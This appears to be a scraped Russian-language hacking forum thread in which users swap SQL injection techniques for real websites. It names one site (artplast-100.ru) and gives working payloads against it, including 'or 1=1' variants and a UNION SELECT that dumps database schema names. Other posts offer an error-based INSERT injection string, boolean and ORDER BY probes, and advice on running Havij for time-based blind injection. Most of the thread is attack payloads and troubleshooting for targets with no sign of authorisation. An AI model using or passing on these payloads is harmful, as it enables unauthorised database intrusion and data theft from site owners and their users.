http://www.artplast-100.ru/news/22/ http://www.artplast-100.ru/news/22-2/ как быть в таком случае? http://www.artplast-100.ru/news/22 or 1=1/ http://www.artplast-100.ru/news/22/**/or/**/1=1/*/ и т д.
http://www.artplast-100.ru/news/(-22)union(select(1),(select(group_concat(schema_name))from(information_schema.schemata)),3,4,5,6)/ но все данные могут не влезть подробный ман
Добрый день Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1 Вот так можно ли это раскрутить и как за ранее спс!
Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\ Code: [COLOR=Red]',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'[/COLOR]
Это оч просто и всего лишь 2 варианта: 1. простой - короткий и понятный ман 2. сложный - использование программ для автоматической раскрутки скулей. Д ты хрен угадаешь что у него там )
Вопрос таков, кручу базу через хавий, показывает базу данных в таком ввиду, что это такое? Почему база так выглядит? Data Base: J.I~?rl21m)" x~^xk[ rr?xWP}S( Length of 'Data Base' is 17 Data Base: Z.F?`W!e?no]2f3kx Length of 'Data Base' is 48 Data Base: Gf1?z@D??A&> ]{ijE&??; xLx?oZ/V?5QzRkq3
мм делал по манулу http://forum.antichat.ru/thread43966.html выбивает ошибку You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6 --', 'ип', 'ваываыв', '2012-02-16 16:34:05',' at line 1
TYPUCT, потому что руками надо делать кодировка Revi, ты уверен что там 6? да и не в этом суть. экстрасенсы не знают что делать может пруф уже скинешь, нет? так вряд ли помогут
Проблема не в том, что SQL BLIND, а в том что Havij похоже крутит её не через ascii(substring(database(),X,1))=Y а через Time-Based SQL Как вы уже знаете, данный вид скули сильно зависит от стабильности канала. Будет лагать канал - получите где то такую же тарабарщину.
Привет получаю следующую ситуацию: Code: /Index.php/cPath/1' показывает Code: 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 1 Как дальше? Софт ест для это?
Руки для этого есть... Code: /Index.php/cPath/1/**/and/**/1=1/**/-- /Index.php/cPath/1/**/and/**/1=0/**/order/**/by/**/X/**/--
Доброго времени суток. Такой вопрос появился. Есть скуля благо POST запросу. С кавычкой, выдает в самом верху сайта на белом фоне: "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in..." Отлично подобрал столбцы. union select 1,2 --, как видим, оказалось 2, ошибка исчезла. Но и не появились поля где может быть скуля. Тобишь не единицы, ни двойки. Решил я подставить что то по типу: version() user() database(). Что тоже не дало никакого результата, кроме того что ошибка исчезала. Вопрос таков, как выйти из этой ситуации, как можно добиться вывода? Или вообще как тут поступать?
Хоть что-нибудь работающее с basic авторизацией+Postgres есть ? Ни хавай,ни бскл во free mode пахать не хотят
